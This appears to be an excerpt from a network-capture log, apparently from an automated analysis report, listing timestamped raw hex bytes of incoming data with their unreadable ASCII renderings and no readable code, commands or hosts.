                                                                                                              2021-11-24 14:07:32 UTC118INData Raw: df f6 32 0e b9 f5 4b 39 1c 8e 66 cd 4c 88 9f 0e 1c a0 d3 80 68 b0 ae d4 80 0a 0d 6d 88 29 43 21 4c 35 78 75 b1 b9 e0 f8 8a b6 b5 df c9 03 44 67 60 95 9f 2f e4 37 bd 0e 6b 13 d7 5b f4 39 89 a9 c4 8f 1a 5e 92 54 12 eb 57 a2 ca 2a 92 89 5f e4 20 7a 40 42 2d 14 3d 85 44 ca 5d f6 3d 5b e8 66 08 8b d1 ab 4f bd 48 3d 08 15 9e d3 18 45 80 61 52 22 d0 cb 06 6a 58 89 a6 c3 f4 29 8f 52 16 f8 32 ee fd 32 df ac 8f 62 36 17 42 50 57 f0 4c b4 cf d5 dd dc fb a6 02 71 a8 e0 52 27 43 d4 17 c8 e2 7e e1 37 94 97 27 e7 10 61 fa f0 9f 21 2b b0 b9 54 d3 25 62 7b 6d 80 72 b0 11 dc 88 32 45 42 94 14 fa d8 db 04 14 ba bd 32 92 fe a3 24 40 00 e3 07 55 7f e3 4f 11 8f 66 f9 5e 5e a2 6e 93 65 24 03 74 d8 06 69 c6 9a 21 79 02 0e 45 ef 7e fa a3 9c cb 0a e9 8f 74 6b fa 89 8b a7 ba fd 6d
                                                                                                              Data Ascii: 2K9fLhm)C!L5xuDg`/7k[9^TW*_ z@B-=D]=[fOH=EaR"jX)R22b6BPWLqR'C~7'a!+T%b{mr2EB2$@UOf^^ne$ti!yE~tkm
                                                                                                              2021-11-24 14:07:32 UTC119INData Raw: a3 13 52 41 a2 f7 7f 54 63 57 b5 91 93 5c 9f e0 6c 6c 6c 8b 39 11 a9 0f e3 c4 7d 12 5a 29 9f fa fb 6a 48 5f 80 ae 49 e6 d1 d7 8d ca bb 12 94 9e 08 85 2a 3b 20 28 11 0b 6f 69 f7 b4 04 eb b8 a2 86 44 77 d5 0f 82 d4 6e 7a 9e 4f 71 93 bd 52 2a 05 12 e3 43 0f c6 f1 be a5 31 97 a1 6a e0 4c 08 cf 55 0c ff b6 0f d0 09 8f 8e c4 45 cc 10 6d 8a 77 f1 d4 43 80 1a 05 4b 2a 92 f8 b9 ec 09 4e de 06 3e f0 80 af 7b ac 38 e6 96 7c 2f ea b0 9a 6f 34 17 f2 1f 2f 70 59 98 b5 c9 99 b6 81 be 02 03 8d 01 da 87 8e 43 0b bb 0a 2c 0c 77 17 da 23 d1 45 7a 48 c0 91 4e 97 11 a6 93 ad f6 e0 d8 36 f2 b2 d1 ac e7 b7 a2 7b 38 0f 21 db 5f 13 fb 86 53 53 6b 54 04 62 93 b1 f0 df 71 a8 43 8f 32 25 7a 8c 12 0e 01 7b d4 aa 96 6b f6 70 1a 9b 43 06 13 a9 20 01 e3 43 69 0b 70 36 c2 70 94 61 fd 18
                                                                                                              Data Ascii: RATcW\lll9}Z)jH_I*; (oiDwnzOqR*C1jLUEmwCK*N>{8|/o4/pYC,w#EzHN6{8!_SSkTbqC2%z{kpC Cip6pa
                                                                                                              2021-11-24 14:07:32 UTC120INData Raw: 60 f1 85 c0 86 42 56 fd 13 8b 43 09 0d 09 f7 8e 82 90 c3 58 48 b7 1b cd 1f 48 84 40 33 08 11 19 81 2e e0 3f f6 b4 03 b9 66 51 f8 46 3d ce 4b 99 5c 0e ee 7c 19 65 f7 9b d7 26 f8 00 e7 a3 b9 8f 8a 71 59 88 96 48 3b e6 be 2f 97 7b 9a 6a b8 1f 8c e2 ed e0 c7 91 3c dd 5b dc d9 1b b1 60 23 93 ff b8 9d 19 d7 7e 5b da 88 50 11 a0 ed b2 c2 82 4d e3 9c 7d 53 10 d0 86 89 ba 1d 90 d0 25 02 a1 30 c6 a9 3b 05 03 40 15 18 99 1a 00 c5 96 eb 13 d0 bf 87 11 81 d9 ec 5a 8d e4 14 bf f1 d3 d9 a9 ba 16 0d 48 c2 c4 6d 2b b1 23 71 d7 22 86 51 92 bb 05 e8 7d b1 f2 ff 77 22 b4 cf cf 5e 73 34 24 63 83 25 78 73 7a bf 51 7e 5b bf da 98 1c 79 81 b2 e0 fd 74 ae 09 d2 51 10 c4 ea 96 c5 02 b2 15 d0 c5 e4 36 81 90 e4 ce 85 a3 14 3f 0d 2f 4f e7 6b 0c e8 58 c4 c4 e7 c1 1b a4 b0 53 e4 51 e7
                                                                                                              Data Ascii: `BVCXHH@3.?fQF=K\|e&qYH;/{j<[`#~[PM}S%0;@ZHm+#q"Q}w"^s4$c%xszQ~[ytQ6?/OkXSQ
                                                                                                              2021-11-24 14:07:32 UTC122INData Raw: 2c 57 0d f5 f9 7b c4 aa e3 a1 ed db 29 5b 1c 5b 17 67 89 0c 68 0e 61 b2 06 91 d5 5d 04 8a 8f d6 34 66 eb 37 a8 01 e3 71 85 c4 a4 2e ae 4b 13 27 78 e9 ff e3 a0 c6 55 a3 24 63 d9 03 3a dc 5f d3 56 19 6b f7 a9 71 b3 41 8e df ad 2d 7b c5 54 a6 1b 3e 91 68 27 c8 66 8c cf a4 a1 49 d7 f0 22 ce 68 a3 71 1a 72 17 82 c9 07 af 07 ca fc 52 67 6d 7d 49 b9 02 08 c5 eb 4b 10 eb 56 92 6a 64 7f 6f 5f 51 cb c5 ec 8f ba c2 91 f8 a1 d4 79 89 69 37 49 a3 88 80 f2 26 84 92 81 b3 af 19 68 ec 60 3e ea ef 59 f9 a7 9e a8 6c 08 c2 8d 1c 02 20 84 26 98 b0 3a 3c 0c 44 65 49 56 0b f2 4a 07 57 a7 75 63 7c 9c ab d7 1d 2d 5b 13 db 78 23 36 19 ed 2c ea 00 30 a8 c9 d6 5b 32 b0 c0 ca bc 2b c4 d2 35 fe c6 20 b4 af 9e f8 a9 b5 9d 3d da a2 4e 74 0a 18 b7 21 40 cf 4a 93 62 61 7f 3c 19 aa 43 e0
                                                                                                              Data Ascii: ,W{)[[gha]4f7q.K'xU$c:_VkqA-{T>h'fI"hqrRgm}IKVjdo_Qyi7I&h`>Yl &:<DeIVJWuc|-[x#6,0[2+5 =Nt!@Jba<C
                                                                                                              2021-11-24 14:07:32 UTC123INData Raw: 7d 7f b9 2b a1 5d 15 43 1b 59 d1 66 3e fb b1 04 7c cd d1 53 64 3f f8 b4 cc d5 07 77 d6 d8 f1 db 6b 86 03 77 b1 18 37 71 d4 09 4b 31 f7 ed 42 74 9e 1a 6e d4 1c a2 da c4 28 ee 95 7f bc b0 3d e5 67 41 91 ed ae 16 89 3b e7 ce d9 56 c0 42 b9 fd 49 dc a7 66 ca 5f 5b ff cb 80 5d f3 49 30 be 9f fa fd 03 a4 d3 3b 27 0a b6 0b bd 56 26 15 ae 2b dc 23 43 15 38 ef b6 c0 8c 45 08 56 f9 6c d5 62 1b a3 52 00 59 1f 7c d7 d3 ce 8b b7 a5 ba 50 70 03 bd 9f fc 04 23 a7 42 b8 6b 0e 95 b5 c7 e4 14 c3 90 38 6f c6 f0 0b 5c 86 a7 3b f3 9a ef 8d 23 ff f1 6b 08 b0 36 6e a9 a4 39 eb 3a 16 37 19 d3 25 6c 91 26 3f 88 6b 30 11 6b fb 38 a9 7d af ea d8 3a 50 2d 49 75 0d c1 f9 84 21 5d f6 a3 c5 72 77 75 ea 17 34 ef 2a cc 60 4e 4a 99 ea 0e 61 8e 58 ef f4 5f 0a c6 f5 4d 43 28 3f 95 49 90 c9
                                                                                                              Data Ascii: }+]CYf>|Sd?wkw7qK1Btn(=gA;VBIf_[]I0;'V&+#C8EVlbRY|Pp#Bk8o\;#k6n9:7%l&?k0k8}:P-Iu!]rwu4*`NJaX_MC(?I
                                                                                                              2021-11-24 14:07:32 UTC124INData Raw: a8 70 0c d9 de c6 d2 ad 5c 3e de dc bc 11 05 74 4e d3 47 d1 da d2 d8 f6 3a 3f a1 d3 74 b8 43 76 42 d6 39 39 b0 b6 8f 81 e8 e0 2b f1 d3 10 a4 f8 04 0f 59 94 da fc a1 0f d0 bb de 4f 40 b0 17 4d 72 e5 fe 94 cf e9 c5 e1 56 c3 03 b9 d2 73 53 3d 98 b9 55 a2 13 de a7 83 6e e8 ac bb 93 bc f5 ae 56 25 3b dc d8 27 74 6b 5e 1a 1a d9 1c 16 c3 87 7d 26 7b 5a 69 f7 9b 6c cc cf cb 62 52 c9 a3 bc 4e 8c 8e 2b 55 cb 25 ee fd 71 56 f1 0b ff 02 ab 57 e2 a2 b7 6b 38 18 4f f0 e1 ab 97 b0 cb 69 37 3a 80 00 dd 7f b1 12 42 83 76 db 49 cd 08 b1 35 37 66 cc bb 98 17 db b1 c0 04 75 5f 3c 21 51 d4 8e 6b 74 e2 db e2 6b b7 f9 3e 7e 9c 92 20 1b 33 c5 15 9c 2f c2 39 be 71 99 d6 d5 c2 70 49 9a 50 49 4a b4 02 30 7b ed d0 85 b2 93 33 fd f9 a5 d4 ea be 5b 72 44 fa 32 90 85 8f 2d 9f df 9d f5
                                                                                                              Data Ascii: p\>tNG:?tCvB99+YO@MrVsS=UnV%;'tk^}&{ZilbRN+U%qVWk8Oi7:BvI57fu_<!Qktk>~ 3/9qpIPIJ0{3[rD2-
                                                                                                              2021-11-24 14:07:32 UTC125INData Raw: 77 be c4 0a 9b a0 86 3f aa d8 27 4d 35 88 1f 90 4a 17 ee e3 a7 54 70 4d a4 66 a3 de 8e bd 91 c6 d4 37 71 a7 55 a9 5a 48 d5 11 dd 45 d7 c9 39 8e 33 aa 37 fa 61 f8 a7 f3 3e 27 91 39 60 e2 a7 f7 3f 4f 85 0e d4 87 84 22 63 bb f6 c5 b6 8c 79 d5 00 13 b8 c4 15 54 e7 c6 8f a9 98 7b 7a 98 22 39 05 ae 0e 6a 2f 46 9b 6e 30 69 09 26 ed 80 fe 54 81 42 1c 0a 0e 67 73 fc 35 d6 14 50 e2 33 76 28 b7 3c 51 e3 08 62 88 28 bc d0 bf 5d 3c 4f 35 f6 a0 43 76 3c 50 01 85 9b f3 ef 23 2c b2 f5 7c a7 3a 5d 84 3d 68 69 18 68 6d 7f 03 d5 8a 44 27 a7 39 b3 c5 e3 23 c4 56 27 e4 a0 d6 4b ce 96 c1 91 f3 e6 b3 60 01 eb 25 da c4 ab d2 7f fd d8 f0 6b 7d 28 e6 13 eb 75 ad 53 7f 47 36 e9 66 ca c3 f0 84 3b 2f c3 30 e4 39 f1 5c af 2e 8d 01 41 07 1c 85 d6 2c 07 a7 ed 9c a4 d8 84 8f 5e 11 2b d6
                                                                                                              Data Ascii: w?'M5JTpMf7qUZHE937a>'9`?O"cyT{z"9j/Fn0i&TBgs5P3v(<Qb(]<O5Cv<P#,|:]=hihmD'9#V'K`%k}(uSG6f;/09\.A,^+
                                                                                                              2021-11-24 14:07:32 UTC127INData Raw: 46 c7 1d ad 1f 52 8f 87 02 f9 39 71 96 a9 24 50 2c 5d 29 c1 f6 83 d3 78 1b d1 3e 0c f8 c3 fe ad 56 c0 d4 06 41 98 5f a2 1d 1e 8a 2e 5f ff fa 85 be 93 01 2a fe 71 f3 19 eb 5a 22 f2 b1 23 91 6c 2f 3a ef 98 2f f0 6d cd ba 7e 24 ae 96 31 00 75 6a 84 f0 b6 ec ba df 61 b3 8a e2 e6 f5 79 55 fa b9 3c 3e 42 31 01 78 af af 93 dc 86 8b 47 55 c7 67 71 9e e4 09 1f a3 bf 43 82 c5 eb 7b fe df 04 df a3 e9 b7 97 db 59 65 31 01 d3 3f 3e eb cc d4 4a f8 8b da 51 29 d3 d2 13 3d 4b 46 90 c7 55 ca 2d 76 e8 e2 60 11 5d f2 aa c4 62 c4 6e 45 8f 18 18 87 c6 da a4 ff 12 97 5a ce 93 50 46 ce 33 85 af 03 3d c2 fe 2d 74 ee 5a 90 ed af 5d a5 54 f2 42 e3 55 3b d5 a1 78 d3 7e 62 6a e0 c9 1d c7 9d 34 6b 63 bf 45 dc 4a 4c 95 93 e6 fe 33 62 fb ad 1e 34 8e 96 90 9d cb fb 28 f6 a6 af fc 1e 4d
                                                                                                              Data Ascii: FR9q$P,])x>VA_._*qZ"#l/:/m~$1ujayU<>B1xGUgqC{Ye1?>JQ)=KFU-v`]bnEZPF3=-tZ]TBU;x~bj4kcEJL3b4(M
                                                                                                              2021-11-24 14:07:32 UTC128INData Raw: 2d 4a 97 2e 51 b4 12 20 7f 6b 16 3e bb 3d 76 32 c4 8d 5c a2 ac 60 f8 bb 6b ab 40 4d 97 eb 7a f9 28 66 db b4 1c 6a 6f 9d 14 e8 46 7e 8f 90 05 0d 14 8e cc 3d 41 20 4f 7b 55 d2 a7 d9 d4 c9 7c 89 f0 07 f8 95 74 56 49 78 05 00 cd 04 fc 17 f8 2c a9 58 d1 c2 67 73 97 60 70 7d dd ad ca 64 5a b8 a6 92 3e 9e 08 ae 81 e8 e1 bd 20 65 c0 09 3e 00 33 2e 18 c3 29 26 79 4f 92 a3 e0 52 4e 2a 93 79 c0 d7 ec 38 c4 fa 2d 51 1a c8 a4 c4 06 5f b9 5d ac 77 42 f0 3b d8 23 5f 81 00 d2 b6 8e 5f 30 52 f3 00 d1 d2 ad 13 82 b1 d0 ac c2 0c 9b c5 34 c1 04 60 62 a8 24 66 e8 97 a2 d8 81 37 6c 4a 2b 20 7a 6d ac 72 fc 63 4a 80 ab d1 16 81 56 4d 09 3b e3 d3 be ee d3 c4 a8 21 18 49 46 30 1d 79 60 32 84 55 32 3b 7e 08 25 ca c9 92 cb 9b 9d c4 a1 1b 63 82 b4 40 b9 75 c5 d3 e3 ac 8d 55 b7 e8 e9
                                                                                                              Data Ascii: -J.Q k>=v2\`k@Mz(fjoF~=A O{U|tVIx,Xgs`p}dZ> e>3.)&yORN*y8-Q_]wB;#__0R4`b$f7lJ+ zmrcJVM;!IF0y`2U2;~%c@uU
                                                                                                              2021-11-24 14:07:32 UTC129INData Raw: db 0b 8d 4d a0 22 8a 83 4c ab 9e a9 ac 76 77 66 61 a4 30 09 eb 89 be cc ea 40 bc 72 47 1d 2c 07 6f 36 89 9a ce a4 15 09 d1 42 0a 39 ef 20 62 4c 1b 39 cb e7 1b 5a 30 d5 a2 b9 d1 15 97 46 49 b0 a0 a6 ac 39 42 d6 d6 bc 8d f3 55 2d 7f cb 5e 32 dd de 12 c6 47 95 8d ac 6e 0d 56 e7 f3 91 ce 2f e0 bb 08 b1 0a 52 7d c3 4c f9 cc 25 47 50 8b 09 42 33 1c ef e1 d2 b1 95 07 02 44 db 2a d1 ef 64 e9 95 6c cf 6c b9 6c 63 11 1f df f0 b8 9b ed c1 82 dd 6f 82 4a 47 40 52 4e e5 61 10 e7 67 27 c8 d2 ab 93 77 d0 65 99 e0 5b a5 e4 2b 45 1f 93 95 56 ea 57 a8 6c 50 fb 30 cd 31 06 c9 9e 88 41 b8 7f bd c9 46 20 96 af 01 24 6b 1f 1b 43 a0 72 c6 f1 f9 9b 43 26 a9 b0 16 6b 03 ac 1e 5e de 0e 51 b4 a4 09 a3 a7 4a 7d 26 c3 f5 88 ad 6b 08 f6 aa 21 9b a7 13 72 e9 8c 61 75 f9 4d fa a8 96 af
                                                                                                              Data Ascii: M"Lvwfa0@rG,o6B9 bL9Z0FI9BU-^2GnV/R}L%GPB3D*dlllcoJG@RNag'we[+EVWlP01AF $kCrC&k^QJ}&k!rauM
                                                                                                              2021-11-24 14:07:32 UTC130INData Raw: d0 e2 c8 76 0e 93 95 ea 83 fa 27 4f 7b ca b4 25 ba a8 3d 02 cf 51 a9 90 d4 3d 49 95 af ec db ba 15 ed 89 84 a0 c2 53 98 d0 59 20 60 95 b0 b7 33 85 c2 f6 c5 9f 44 67 20 83 e1 f8 34 c1 b5 76 de f9 2e 9e 2c 85 bb 0d ab bf 84 b8 07 62 d8 f8 91 6b b5 ce 63 f1 83 5b 07 db e2 a7 ea ad dc 6c 93 ac 63 bb 55 17 2c 59 ed 59 a3 61 c4 dd a0 3a c5 ae e2 89 55 a0 3d d4 b2 df 12 10 32 98 35 61 b3 23 32 47 24 6a 16 d3 c6 a2 c9 8d 94 22 93 34 b1 1d 2a 4d 53 28 3f 95 92 93 a3 30 2d 2c 2e 38 53 a5 8d f0 97 cb 5c da 72 cb 03 ab cb aa 89 d9 db 07 d8 fe dd 7c 41 e4 f2 27 2c 07 92 73 69 f3 5c 22 6b 8f d0 c9 d6 a4 df b3 d0 22 75 0d 30 cd 09 d2 aa e9 a2 4b 15 7c fd 64 1b df bb be ed ed 53 d7 03 b3 d3 2d 63 4e ee 01 93 95 fc 1f 2b 23 08 60 bd ec a5 b9 db 6a 13 f5 82 70 78 83 2f 95
                                                                                                              Data Ascii: v'O{%=Q=ISY `3Dg 4v.,bkc[lcU,YYa:U=25a#2G$j"4*MS(?0-,.8S\r|A',si\"k"u0K|dS-cN+#`jpx/
                                                                                                              2021-11-24 14:07:32 UTC131INData Raw: 83 a4 f1 34 10 c6 e7 b2 0e 73 34 66 f3 4e 7d 2e e4 8f d6 ab 5f 69 16 5d 46 2b 5b 8c 1c 44 5e d5 68 a5 0d 5a bf 1c 8e c7 ed 31 10 68 27 7d c1 2e c5 7e 67 7b 73 18 e8 cf 18 37 50 27 c6 86 e0 04 cc 17 5c c8 90 9f c8 85 81 0d f4 a1 e5 13 42 6b 86 e1 1a 88 11 56 14 64 e4 25 c2 5b f4 7f 27 59 67 bc 2a 17 b9 e8 45 8b c3 58 9e a1 65 39 22 91 46 51 63 f6 a6 65 76 b8 b4 73 cb e3 c0 01 1c 8c 05 7a 65 ce dc 9c 06 63 8d 2b 0c 9e e9 f5 e4 b6 34 53 ee 07 d0 bf c2 4f 0a 65 da fa 32 dd 61 8b 34 7d 46 03 55 0b 34 d2 3b 82 67 91 6e 19 61 7f bb 97 fa ef e0 03 df c6 af 8e 69 f5 1c 7e 9c 4e c0 ec 5c c3 c5 88 c6 20 59 34 5f 80 de d3 dd 81 a9 85 c2 a5 56 b8 0c cc 10 64 01 12 71 be a6 8a d0 71 fa fd 3d f5 02 42 88 30 6e 64 40 0f d3 7f 21 fb a1 bf de cf 1f fa ac 66 a3 8a 98 c0 1e
                                                                                                              Data Ascii: 4s4fN}._i]F+[D^hZ1h'}.~g{s7P'\BkVd%['Yg*EXe9"FQcevszec+4SOe2a4}FU4;gnai~N\ Y4_Vdqq=B0nd@!f
                                                                                                              2021-11-24 14:07:32 UTC132INData Raw: 52 43 12 3a 5d 42 f6 ab 30 ea 2a 13 8f 64 81 fa 41 9a 14 5d e4 c5 dd d6 f0 39 e9 82 43 c8 3e 4e e9 c1 ba 64 d8 a8 fc d0 9b a2 73 8e 1e 44 99 ea 6b 0b b5 54 4a 36 b3 5c 40 c9 9a 54 74 49 b8 db 77 a2 a0 ed 8a b0 65 7b 76 eb 9c 68 eb ba 9c 8f cc e2 24 81 62 94 1a 08 7b d6 87 e4 fa 0e dd 7d ab a4 07 b0 bf df 5b ca 19 3f 6e 31 6a 03 da c9 b9 e5 47 eb 6e 5a ea da c0 bd 1e d7 8c a5 b5 e1 0e c8 61 85 2a c1 ed d4 14 f2 07 d1 9d 77 b0 5c 55 14 0f f2 ba 49 ea 7b 74 39 3f 05 0f 50 10 fa d6 5e f8 d7 27 8f bc b3 ed 6e 7d 1a 9d 41 79 54 eb 91 fe b0 42 0d 1e 99 c8 ae 34 dd 84 07 3c 59 19 bc f4 a2 d9 a3 5d 7f 51 64 db 56 75 8d 87 c9 94 00 e7 5a fb c1 94 cc 0f 07 70 a5 5a 36 42 48 81 c2 b8 e9 24 33 1d d9 f3 ac 41 46 90 a6 9b 65 c1 45 65 37 c1 63 9f 1c d3 22 4f 18 0d 97 1a
                                                                                                              Data Ascii: RC:]B0*dA]9C>NdsDkTJ6\@TtIwe{vh$b{}[?n1jGnZa*w\UI{t9?P^'n}AyTB4<Y]QdVuZpZ6BH$3AFeEe7c"O
                                                                                                              2021-11-24 14:07:32 UTC134INData Raw: 19 95 0a 95 21 66 ef 0a 55 b5 17 5c 8f 5e e9 57 e5 e2 a2 3e 22 54 10 c2 3b 26 e2 49 99 26 41 51 12 6c f9 a8 66 69 11 7d ce b5 ba f6 b2 2f b4 5e 07 49 5f 4a f8 24 6d c2 94 4d 7f 50 5e f0 db 1a 0c 3b db 2c f4 df 4d 38 5b 8e 4b 59 08 53 1a 90 20 8b 5c 26 19 3d 47 90 88 56 2c d1 2f e4 b2 c2 36 57 18 a9 0f 8b 10 4a ff 40 66 11 09 88 28 f5 77 79 50 0b a8 cb 61 48 a1 59 97 45 6a c2 ad cc 94 17 f6 c9 d6 50 eb b0 a3 ae 6a 7c f9 22 a3 0d 9d 71 a9 43 55 ab 26 00 92 c9 22 74 42 a0 d4 a3 80 4e 47 d8 39 96 77 de 02 c4 92 78 8a 90 a2 0c 7e 36 9e e5 c5 71 e6 78 1d f4 92 1a 88 ac f4 fa 27 cc ca 5e e2 8b 6c 98 29 a5 d8 9d c2 26 35 62 61 15 64 a4 0a 6e 7f 94 fc 1b 13 aa b3 02 cd dd d8 da 03 1f c7 a1 91 0a f0 1e 87 1c c8 20 5f 67 3a b9 e2 97 ca 3b 28 31 88 1f 3d 7b a8 73 f0
                                                                                                              Data Ascii: !fU\^W>"T;&I&AQlfi}/^I_J$mMP^;,M8[KYS \&=GV,/6WJ@f(wyPaHYEjPj|"qCU&"tBNG9wx~6qx'^l)&5badn _g:;(1={s
                                                                                                              2021-11-24 14:07:32 UTC135INData Raw: 88 53 12 26 1f 6a 1e 02 dc ed 17 b0 81 ab 95 69 2d 42 9a d2 27 d5 bf 2f bb 59 7a 7f 68 91 87 b5 08 e8 c1 cf c8 cf cd 24 9c ae 05 68 cd 72 24 ec 33 be d8 d7 c4 f6 fd 74 78 98 3d 97 c0 26 a6 f6 c7 e4 7f 76 00 e3 56 d9 0d 08 2b bd 1d 09 91 b5 eb 7d b3 5d 93 70 25 b1 bf e0 2e 16 d8 6a f9 19 18 d5 57 a4 0f 85 ac 5b ad 96 6c 91 ec d4 64 07 79 57 09 57 50 02 e9 a4 04 16 3b 39 23 ae 47 e8 6d 50 01 31 37 94 18 69 78 98 2f 62 d3 c7 6d 56 18 e9 6a bb f3 b3 29 a5 ce fb e0 78 c4 29 a8 6d 67 a5 89 a5 f7 ce 0f 2c 4a e8 5a 52 3a fe 42 18 45 e7 a3 c3 83 8e da ef 71 ee c7 fe ba 11 61 01 cb 99 15 d6 b7 89 a3 e4 c1 6c 75 b8 84 78 cc ee 93 47 c1 56 f5 12 6f ef 8b ee 0c 99 82 64 4c 11 1c 0c 3f 08 be 34 7d 69 27 dc 21 e7 bc a2 ba 88 4c a5 9e 12 dc 88 db fb c9 75 e4 63 12 2b 51
                                                                                                              Data Ascii: S&ji-B'/Yzh$hr$3tx=&vV+}]p%.jW[ldyWWP;9#GmP17ix/bmVj)x)mg,JZR:BEqaluxGVodL?4}i'!Luc+Q
                                                                                                              2021-11-24 14:07:32 UTC136INData Raw: 28 2a 61 24 cf 72 c2 1c 08 96 28 6b 81 8e b7 9d 87 fc c0 41 1a 72 4e b2 20 aa e3 76 61 ca 27 c1 ab 74 df 2b 42 ae b6 cc 8d 7f f6 7d 22 88 d1 e5 24 55 56 2d 77 9f 31 2f d6 40 6d fa a0 ba 02 00 35 01 4f f1 54 d1 92 1f a8 65 ea ea 03 1a 1c 18 a1 2e 3a f3 98 c2 1e cf b3 98 1a d3 5b 08 d0 e1 f9 61 4c 0b f3 d9 b0 32 df dd 27 82 e7 61 6c 21 c8 e7 c4 a4 01 72 37 eb bc fe a6 49 9f 88 4b 86 4e bf cc 12 76 e8 08 bc e2 83 c8 6f 70 73 45 ee 14 fc bb d9 b8 20 aa 98 e1 09 78 28 16 04 d6 b3 6d ac aa 04 2a c4 aa 33 db 61 b3 80 4c 10 78 93 3e f0 d7 af fe 3a a5 e6 99 bb 3e 58 90 a6 a4 9a d7 da ca 89 64 92 de 8c 55 a4 35 e7 51 28 78 48 b3 53 63 4f 8f c5 9b 49 bb 0b 7e 7b 20 52 8e fe bb 18 28 41 73 47 54 b7 e8 61 85 7d df 39 f1 39 1a 5c 2c 4d 79 e0 fa dc 71 00 7b 8c 26 d8 6c
                                                                                                              Data Ascii: (*a$r(kArN va't+B}"$UV-w1/@m5OTe.:[aL2'al!r7IKNvopsE x(m*3aLx>:>XdU5Q(xHScOI~{ R(AsGTa}99\,Myq{&l
                                                                                                              2021-11-24 14:07:32 UTC138INData Raw: ef 0a 84 8d 52 ad 3d 92 94 4e 52 39 bb 43 0d 33 24 f1 63 f2 c0 12 06 9a ac 4d d8 7b ce 68 5b a1 27 ff 75 6c c0 4e 81 0d d0 8c 73 d0 68 16 27 e7 08 2e 59 a9 23 97 13 b9 dd 38 3d d3 4e e6 e1 32 bc 8c e2 35 ec ff d7 bf d8 6b 2d 38 f0 44 0b b4 81 c6 ff 6e 41 55 1a 42 7e 66 e8 2e 1c 83 97 5a 60 05 27 22 6c 7e fa 2f db 5e fa 62 d2 38 0c a6 a6 cb 89 33 19 12 78 19 da b0 40 24 81 48 22 9a 43 6c c1 3b cc 54 e2 cc 97 aa 25 2a a5 36 ae a9 c0 1f 33 04 7e 54 75 58 de 2d 4b ef 37 f6 62 05 76 10 56 88 46 e2 1c 3d 0b 34 ce c9 3c 4c 20 b4 75 83 f6 d7 ad 7a 2d 28 62 45 4e 10 a7 45 2c 26 57 25 4f 58 da 69 2f 0d b4 32 a5 7b 43 dd c7 fe 1d ff 90 34 0b 3f 00 b9 3c 0f 34 06 20 33 de a3 29 9b 92 90 2a 9a d2 55 85 d3 c8 6e 42 73 2c 46 41 64 21 59 ad 90 21 d0 e3 0d 99 d4 69 37 9b
                                                                                                              Data Ascii: R=NR9C3$cM{h['ulNsh'.Y#8=N25k-8DnAUB~f.Z`'"l~/^b83x@$H"Cl;T%*63~TuX-K7bvVF=4<L uz-(bENE,&W%OXi/2{C4?<4 3)*UnBs,FAd!Y!i7
                                                                                                              2021-11-24 14:07:32 UTC139INData Raw: 2e 0b 75 10 8f 25 1b e7 41 cf 9a b4 89 68 63 91 7d 34 51 a9 5a d5 bb 15 10 f4 5c c5 5b b1 52 d2 6a 74 59 63 7c 67 3f ae f4 4c c8 b5 13 d6 24 38 8b 90 7f 13 9a c5 74 4e 29 02 8f 1e cd 94 e3 f3 59 11 a1 39 3b de a0 31 7d 6a 5c 78 b3 a3 2a 7e 8c 65 27 f9 4e a3 7c 66 b1 a9 8c 97 8e 44 b6 da 27 6f aa 2d aa 40 6a dd 72 4c 74 5e c6 09 3b 34 59 1b a1 3f b5 c4 ec 74 73 98 62 4e 65 dc 02 81 d0 5b 1e f6 15 14 b0 a2 0e 51 cd 00 d7 ce aa 89 40 44 46 a9 28 85 62 00 e3 59 78 3a 89 d4 f0 f2 94 8f fc 4e dd d1 08 71 8b 95 0a 0d e9 0a d2 c8 e2 97 2e 92 87 7b cb 36 9e c9 66 21 f2 43 c4 2e 8b 5e 2b 59 88 21 ef fb 0f bc 46 91 76 41 5a ef 0d 07 14 e4 af 5d ca 19 35 13 b8 7e 2e 8f e0 52 2d 89 88 fb b8 62 7d ce c4 06 c5 b4 cd b9 59 bb e2 3e fd d8 5b 9b 38 1f ba 5f a9 a2 bb 5e 47
                                                                                                              Data Ascii: .u%Ahc}4QZ\[RjtYc|g?L$8tN)Y9;1}j\x*~e'N|fD'o-@jrLt^;4Y?tsbNe[Q@DF(bYx:Nq.{6f!C.^+Y!FvAZ]5~.R-b}Y>[8_^G
                                                                                                              2021-11-24 14:07:32 UTC140INData Raw: a9 f8 86 8d e6 a4 42 be 7e 01 70 08 94 96 e0 22 52 9f 61 c5 7e b5 a9 9b bf 7e 00 12 62 3d b2 bd 8b 49 2b 7a 7f 35 0f 3a b5 c5 95 70 ab 05 cf 69 2b 3e 8c 80 72 1d f2 57 6e fd d8 c1 7d e0 e3 19 ec d0 98 ca 59 25 26 2f 79 59 e5 60 14 f6 95 70 8e ea 55 39 8a c3 00 f1 08 36 8f b2 12 0c 1b 5e ee 1f 68 53 93 a5 7a 5d c0 03 34 2c 86 9c 94 fc c2 e5 71 59 d5 38 ab 2e f4 a2 99 07 2c 2c 11 ef b1 1b 22 12 15 aa cc 7c 8b b5 9b 2d ec 58 f7 01 ac bc 02 a4 32 88 fe 11 57 75 e6 8a 97 cf c3 60 81 d8 4a fd 8d 76 5d 2b 05 a2 34 b2 e3 1e 9c 35 b2 7d 98 8f a8 e8 bc 8e c8 7b f9 50 57 7e 51 a3 3c 96 4e be 48 73 d9 b5 1b f3 c5 fd bb 40 99 79 90 29 19 32 10 08 2d 7d 3f 62 e5 e3 83 83 bf b0 de 7e 20 90 6b cf 28 f8 6d 9e 6e 5e 25 95 03 f5 c0 d7 38 35 29 5f 33 a6 e5 d8 9b c0 e7 0f 5b
                                                                                                              Data Ascii: B~p"Ra~~b=I+z5:pi+>rWn}Y%&/yY`pU96^hSz]4,qY8.,,"|-X2Wu`Jv]+45}{PW~Q<NHs@y)2-}?b~ k(mn^%85)_3[
